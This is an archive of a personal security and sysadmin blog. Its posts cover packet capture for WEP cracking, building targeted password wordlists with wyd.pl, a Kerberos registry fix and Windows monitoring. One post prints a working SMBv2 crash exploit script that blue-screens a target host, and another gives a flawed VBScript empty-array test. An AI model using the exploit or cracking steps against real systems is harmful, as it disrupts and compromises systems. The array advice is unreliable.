Feb/100
Wireless packet capture Airport Extreme
So when using tools like the aircrack-ng suite, it becomes necessary to have a packet capture of the traffic. The problem is that if you are doing this from a newer MacBook like mine, there are sometimes issues with putting the card into monitor mode. This can create a problem when trying to capture the beacon frames that are used in cracking wireless encryption.
One of the things that Apple doesn't tell you is that they actually have a packet capture tool built right into OS X. The best thing is that it will capture all of the AP traffic so that you can run the aircrack-ng suite against it.
It is pretty buried, so the first thing we will do is create a symlink to the actual binary.
sudo ln -sf /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /opt/local/bin
Now that we have a symlink in a directory that is on the system path, all we have to do is run:
sudo airport sniff
This will start creating a .cap file in /tmp. Once you are finished with the capture you have to press Ctrl-C to exit, but you now have a shiny .cap file of all the traffic. The downside to using this tool is that it doesn't give you any type of status or progress, so it's your best guess as to whether you have enough traffic for something like an IV reuse attack for WEP cracking.
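Since the tool gives no feedback, a quick way to check that the card actually captured 802.11 management traffic is to count total and beacon frames in the resulting file. This is an added example, not part of the original post: it parses a classic pcap file and assumes the frames are either raw 802.11 (linktype 105) or radiotap-prefixed (linktype 127); the sample capture is constructed inline.

```python
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4          # magic as read from a little-endian file
PCAP_MAGIC_BE = 0xD4C3B2A1          # same bytes read from a big-endian file
LINKTYPE_IEEE802_11 = 105           # raw 802.11 frames
LINKTYPE_RADIOTAP = 127             # radiotap header prepended to each frame

def _record(frame, ts):
    """One pcap record: ts_sec, ts_usec, incl_len, orig_len, then the frame bytes."""
    return struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame

def build_sample_pcap(radiotap=False):
    """Constructed capture with two beacons and one data frame (not a real capture)."""
    linktype = LINKTYPE_RADIOTAP if radiotap else LINKTYPE_IEEE802_11
    header = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, linktype)
    # 8-byte radiotap header: version 0, pad, length=8 (little-endian), empty present word
    prefix = b"\x00\x00\x08\x00\x00\x00\x00\x00" if radiotap else b""
    beacon = prefix + b"\x80\x00" + b"\x00" * 22   # frame control 0x80: mgmt/beacon
    data = prefix + b"\x08\x00" + b"\x00" * 22     # frame control 0x08: data frame
    return header + _record(beacon, 0) + _record(beacon, 1) + _record(data, 2)

def count_frames(pcap_bytes):
    """Return (total_frames, beacon_frames) for a classic pcap file."""
    magic, = struct.unpack("<I", pcap_bytes[:4])
    if magic == PCAP_MAGIC_LE:
        end = "<"
    elif magic == PCAP_MAGIC_BE:
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype, = struct.unpack(end + "I", pcap_bytes[20:24])
    total = beacons = 0
    off = 24
    while off + 16 <= len(pcap_bytes):
        incl_len, = struct.unpack(end + "I", pcap_bytes[off + 8:off + 12])
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < incl_len:
            break      # truncated final record, e.g. a capture cut off by Ctrl-C
        total += 1
        if linktype == LINKTYPE_RADIOTAP and len(frame) >= 4:
            rt_len, = struct.unpack("<H", frame[2:4])  # radiotap length is always LE
            frame = frame[rt_len:]
        elif linktype != LINKTYPE_IEEE802_11:
            continue   # not an 802.11 capture; only count the frame
        if frame and frame[0] == 0x80:   # type 0 (management), subtype 8 (beacon)
            beacons += 1
    return total, beacons
```

Point `count_frames` at the bytes of the /tmp .cap file to see whether beacons are arriving at all; a capture with zero beacons usually means monitor mode did not take.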
Nov/092
Custom word lists with wyd.pl
For those of you who don't know what a word list is, a word list is...dun dun dun....a giant list of words.
They can be used for many things, but in our case they are used for brute forcing possible passwords for various things, from a user's login to a website to the WPA-PSK encryption a company may be running to protect its wireless network from intruders. You can find a bunch of websites that have word lists on them around the web by searching Google. For higher quality word lists, though, you may have to fork out some cash.
This is all fine and dandy, but these word lists are usually based on the English language. What if a company has created a password that is tailored to their company? For example, using the last name of the founder of the company as their WPA-PSK password. If a company has done this, there goes the word list you found based on almost every word in the English dictionary. In comes wyd.pl!
wyd.pl was developed by Max Moser & Martin J. Muench and is included on BackTrack. The general idea behind the tool is to gather data about a specific target and generate a word list based on this data. Enough of the talk, let's see this tool do its magic. In three simple commands we can have a word list based on all the data we can collect from a target website.
wget -r http://www.mstaint.com
wyd.pl -n -o wordlist.tmp mstaint.com/
cat wordlist.tmp | sort | uniq > wordlist.txt
I started off above by doing a recursive wget of this website, www.mstaint.com. Doing this will create a directory mstaint.com, and it will spider through the website doing a wget on each page it can reach.
Next is where wyd does its magic. Take a look at my output below:
enigma:wyd gerry$ ./wyd.pl -n -o wordlist.tmp mstaint.com/
*
* ./wyd.pl 0.2 by Max Moser and Martin J. Muench
*
* Error initializing some modules:
wlgmod::doc: Cannot find 'catdoc' (http://www.45.free.net/~vitus/software/catdoc/)
wlgmod::odt: Canont find module OpenOffice::OODoc (http://www.cpan.org/modules/index.html)
wlgmod::mp3: Cannot find 'mp3info' (http://www.ibiblio.org/mp3info/)
wlgmod::pdf: Cannot find 'pdftotext' (http://www.foolabs.com/xpdf/)
wlgmod::jpeg: Cannot find 'jhead' (http://www.sentex.net/~mwandel/jhead/)
wlgmod::ppt: Cannot find 'catppt' (http://www.45.free.net/~vitus/software/catdoc/)
Ignoring file 'mstaint.com/me.jpg'
Ignoring file 'mstaint.com/xmlrpc.php?rsd'
Wide character in print at ./wyd.pl line 153.
Wide character in print at ./wyd.pl line 153.
Ignoring file 'mstaint.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=5.3.1'
Ignoring file 'mstaint.com/wp-content/themes/lightword/style.css'
Ignoring file 'mstaint.com/wp-content/themes/lightword/js/cufon.js'
Ignoring file 'mstaint.com/wp-content/themes/lightword/js/mp.font.js'
Ignoring file 'mstaint.com/wp-content/themes/lightword/js/tabs.js'
Ignoring file 'mstaint.com/wp-includes/wlwmanifest.xml'
Ignoring file 'mstaint.com/wp-includes/js/comment-reply.js?ver=20090102'
Ignoring file 'mstaint.com/wp-includes/js/jquery/jquery.js?ver=1.3.2'
** Done
Taking a look at wordlist.tmp, we can see that wyd created a pretty extensive word list out of everything it could find in the data we downloaded earlier. One thing you may notice is that nothing is in order and there may be duplicates. Let's fix this with our final command.
enigma:wyd gerry$ cat wordlist.tmp | sort | uniq > wordlist.txt
Our last little command sorts the list alphabetically and then runs uniq over it, removing all of the duplicates.
Take a look and enjoy your new word list in wordlist.txt!
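As an added example (not from this post and not wyd.pl's own code), here is a small Python version of the three steps above, used the way a defender would: extract visible text from pages already downloaded, tokenise, sort and dedupe, then screen your own users' passwords against words that describe your organisation. The sample pages are constructed, and `min_len` / `include_numbers` are this example's own knobs, not wyd.pl options.

```python
import re
from html.parser import HTMLParser

# Constructed sample pages standing in for the files a recursive wget leaves behind;
# not the real content of mstaint.com.
SAMPLE_PAGES = {
    "index.html": "<html><head><title>Acme Widgets</title></head><body>"
                  "<h1>Welcome to Acme</h1><p>Founded by J. Hartwell in 1998.</p>"
                  "<script>var ignored = 'ignored';</script></body></html>",
    "about.html": "<p>Acme ships widgets from Springfield. Ask for Hartwell.</p>",
}

class _TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> bodies."""
    def __init__(self):
        super().__init__()
        self.chunks, self._skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)

def build_wordlist(pages, min_len=4, include_numbers=False):
    """Extract words from HTML pages the way wyd does: strip markup, tokenise,
    drop short tokens (and pure numbers unless asked), lower-case, sort, dedupe."""
    words = set()
    for html in pages.values():
        extractor = _TextExtractor()
        extractor.feed(html)
        for tok in re.findall(r"[A-Za-z0-9]+", " ".join(extractor.chunks)):
            if len(tok) < min_len or (tok.isdigit() and not include_numbers):
                continue
            words.add(tok.lower())
    return sorted(words)   # the `sort | uniq` step, with case folding added

def password_in_org_wordlist(password, wordlist):
    """Policy check for your own users: does the password, minus trailing digits and
    punctuation (the usual 'Hartwell1998!' pattern), reduce to an org-derived word?"""
    base = re.sub(r"[0-9!@#$%^&*.]+$", "", password.lower())
    return base in set(wordlist)
```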
Enjoy!
Nov/090
Microsoft Kerberos Awesomeness!
So anybody that has worked on a large domain has probably run into this issue before.
When joining a machine to a windows domain, there is the possibility that the following error can occur:
Not enough storage is available to complete this operation.
Now now...I know what you may be thinking. "I have a 500Gb hard drive, what the hell is this talking about?" Unfortunately, it is not referring to the space on your machine, or the space on the server for that matter. This error message means that the number of tokens, or "group memberships", exceeds the default maximum number of bytes of data that can be included in a Kerberos packet. This size can vary depending on the operating system, but there is a way to fix this problem. Adding the following registry key forces the maximum size of the data to a very large value so we don't have this problem.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters]
"MaxTokenSize"=dword:0000ffff
In decimal, that value is 65,535 if you would like to do it that way. Once you set this value, restart your machine and you should be all set. No more errors.
Sep/090
Microsoft SMB2 Vulnerability update.
Microsoft has released a news update with links to a "Microsoft Fix It" package that will disable SMBv2 until a proper patch is released. Check out http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx to read.
For those of you that do not know what I'm talking about, by using a specially created packet an attacker can exploit a bug in SMBv2 (the protocol that Microsoft File and Print Sharing relies on) and cause a system to blue screen and reboot.
I have tested this myself and it has worked every time... sorry Chaim.
Below is the code that I have been using to actually exploit this vulnerability. Use with caution and don't be malicious. I take no responsibility for your shenanigans.
This code came from milw0rm.
#!/usr/bin/python
from socket import *
from time import sleep
hosty = "ip.of.target.machine"
print hosty
host = hosty, 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.settimeout(1)
s.connect(host)
s.send(buff)
s.close()
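From the defender's side, the comment in the packet above already names the anomaly: a Negotiate Protocol request whose Process ID High field is not the normal zero. As an added example (not from the post or from milw0rm), this Python snippet parses the SMB1 header of a NetBIOS session message and flags that condition; the test requests are constructed with header fields only, no dialect list.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72

def build_negotiate_request(pid_high):
    """Constructed minimal Negotiate Protocol request (header only, no dialect list)."""
    smb = (SMB1_MAGIC
           + struct.pack("<B", SMB_COM_NEGOTIATE)   # Command
           + b"\x00\x00\x00\x00"                    # NT Status
           + b"\x18"                                # Flags
           + b"\x53\xc8"                            # Flags2 (0xc853 little-endian)
           + struct.pack("<H", pid_high)            # Process ID High
           + b"\x00" * 8 + b"\x00\x00"              # SecurityFeatures, Reserved
           + b"\xff\xff\xff\xfe\x00\x00\x00\x00"    # TID, PID low, UID, MID
           + b"\x00\x00\x00")                       # WordCount 0, ByteCount 0
    return struct.pack(">I", len(smb)) + smb        # 4-byte NetBIOS session header

def parse_smb1_header(payload):
    """Return the SMB1 header fields of a NetBIOS session message, or None if not SMB1."""
    if len(payload) < 36 or payload[4:8] != SMB1_MAGIC:
        return None
    (command, status, flags, flags2, pid_high, _sec, _rsv,
     tid, pid_low, uid, mid) = struct.unpack("<BIBHH8sHHHHH", payload[8:36])
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "pid_high": pid_high, "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid}

def suspicious_negotiate(payload):
    """True for a Negotiate Protocol request whose Process ID High field is non-zero,
    the field the packet above deliberately leaves set (normal value is 0)."""
    hdr = parse_smb1_header(payload)
    return bool(hdr and hdr["command"] == SMB_COM_NEGOTIATE and hdr["pid_high"] != 0)
```

Feed `suspicious_negotiate` the TCP payload of each inbound port 445 connection's first message to log hosts sending this malformed negotiate before the Fix It or patch is applied.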
Sep/090
Some updates!
Hey everyone,
Just thought I would update everyone on the different projects I have been working on lately.
School has started again and I now have a week of grad school under my belt, nothing too hard or exciting with that.
I have, though, been working on redesigning and planning SPARSA's 7th Information Security Talent Search, which will be held in March 2010. The old ISTS that has occurred for the past 6 years has been scrapped and I have redesigned the entire competition to bring new challenges and excitement to an already awesome competition. This year will be the biggest and baddest ISTS yet. Once I finish rewriting the registration website, I will be opening up registration to everyone! Stay tuned for more information as more and more work gets finished up.
Stay tuned for more updates coming soon!
Sep/090
Detect empty arrays in VBScript
So for those of you who have tried to determine the size of an array in VBScript and have failed, this may be for you. I recently needed to be able to determine if an array was size 0 in VBScript and was running into some issues.
VBScript does not have a .SizeOf() function that you can execute on an array to determine its size. Normally what I would do in most other languages is something like the following:
if sizeof(array) = 0
{
//do something here
}
To accomplish this in VBScript you need to do the following.
If IsNull(array) Then
    'Do Something Here (VBScript comments start with an apostrophe, not //)
End If
Why can't you do things like the rest of the world VBScript!!!!! That is all.
Aug/090
RIT GMail now live!
After over a year of work...we officially launched Google Apps for RIT!
Students can now migrate their accounts over to Google and no longer have to worry about hitting those quota limits!
Head on over to http://google.rit.edu to start today!
Good job to the rest of the team...we worked hard and we finally did it!!
Aug/090
Secure Web Form Development
For anyone that does any type of web development, you should know that XSS has become a major security issue these days.
I found a great article over at Nettuts that gives a great tutorial on how to secure your web forms with form keys. Each and every time a form is displayed to a user, it creates a key and then checks that key when the form comes back, to make sure that someone is not trying to inject data through your forms.
Drop on over to here to take a look at the tutorial.
Enjoy!
Aug/090
Beginning winSecure & taking requests!
I decided that this week, I'm going to put together a new script called winSecure.
This script will be designed to secure a default Windows XP installation based on common good practices for system administrators to use. I will be putting all my design notes and work progress on my google code site, so drop on over there to see the progress and offer up any suggestions for what you want to see in the script.
Also, I decided that I would love to share my knowledge of Windows scripting with WMI and ADSI to the community so I am now officially taking requests for scripts that you the community would like to see developed to make your job easier. So drop me an email gerry [at] mstaint [dot] com with some specs.
Enjoy!
Jul/092
Windows Update monitoring with Xymon
Xymon is a pretty cool and free system and network monitoring solution. Some of you may know it as Hobbitmon, as it recently was forced to change its name because of some lawsuit, I guess.
For those of you who haven't heard of it before check it out over at http://hobbitmon.sourceforge.net/. We use it currently at RIT to monitor a few hundred systems ranging from Windows to VMWare and Solaris. It basically does it all.
Using the BBWin client over at http://bbwin.sourceforge.net/ we are able to monitor anything and everything that you can script in Windows. Whether it be monitoring drive and memory usage right on down to parsing log files for specific events...if you can script it, it can be monitored.
What I ended up doing was writing a VBScript that would be executed by BBWin and would then use the Windows Update API built into Windows to check for and then create a report about critical patches that are not installed or not yet active (the patch is installed but the system has not been rebooted).
You can download the script on my Google Code at http://code.google.com/p/mstaint/. Installation instructions are included in the zip file download.
Drop me an email if you have a feature request for something you would like to see added to it.
Enjoy.